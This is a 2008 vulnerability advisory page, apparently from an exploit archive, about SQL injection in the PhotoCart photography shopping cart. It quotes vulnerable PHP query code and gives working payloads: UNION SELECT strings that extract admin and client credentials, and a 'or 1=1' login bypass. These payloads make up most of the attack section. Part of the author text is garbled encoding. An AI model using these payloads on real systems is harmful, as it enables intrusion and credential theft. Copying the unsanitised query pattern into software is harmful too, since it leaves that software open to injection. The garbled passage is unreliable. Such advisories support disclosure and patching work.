PhotoCart <= 3.9 Multiple Remote SQL Injection Vulnerabilities

2008.08.27
Credit: Dok_tOR
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Author: ~!Dok_tOR!~ Date found: 18.08.08 Product: PhotoCart Version: 3.9 &#208;&#178;&#208;&#190;&#208;&#183;&#208;&#188;&#208;&#190;&#208;&#182;&#208;&#189;&#208;&#190; &#208; &#208;&#177;&#208;&#190;&#208;&#187;&#208;&#181;&#208;&#181; &#209;&#65533;&#208;&#208;&#189;&#208;&#189;&#208;&#208;&#181; &#208;&#178;&#208;&#181;&#209;&#65533;&#209;&#65533;&#208;&#208; Type: Photography Shopping Cart URL: www.picturespro.com Vulnerability Class: SQL Injection /[installdir]/search.php Vuln code: PHP: if($_REQUEST['searchby'] == "qtitle") { $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' "; print "Results for Gallery or event name: ".$_REQUEST['qtitle']." "; } if($_REQUEST['searchby'] == "qid") { $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' "; print "Results for Gallery or event ID: ".$_REQUEST['qid']." "; } if($_REQUEST['searchby'] == "qdate") { $gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday'].""; $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' "; print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." "; } magic_quotes_gpc = Off Example: http://[server]/[installdir]/search.php &#208;&#65533;&#208;&#178;&#208;&#190;&#208;&#208;&#208;&#188; &#208;&#178; &#208;&#191;&#208;&#190;&#208;&#187;&#208;&#181; Gallery or event name: Exploit 1: ' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26 from admin/* Exploit 2: ' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,c lient_email),7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26 from pc_clients/* Authentication Bypass SQL Injection /[installdir]/_login.php Vuln code: PHP: $result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'"); Email Address: 1' or 1=1/* Password: 1' or 1=1/*

References:

http://xforce.iss.net/xforce/xfdb/44607
http://www.securityfocus.com/bid/30786
http://www.milw0rm.com/exploits/6285
http://packetstormsecurity.org/0808-exploits/photocart-sql.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top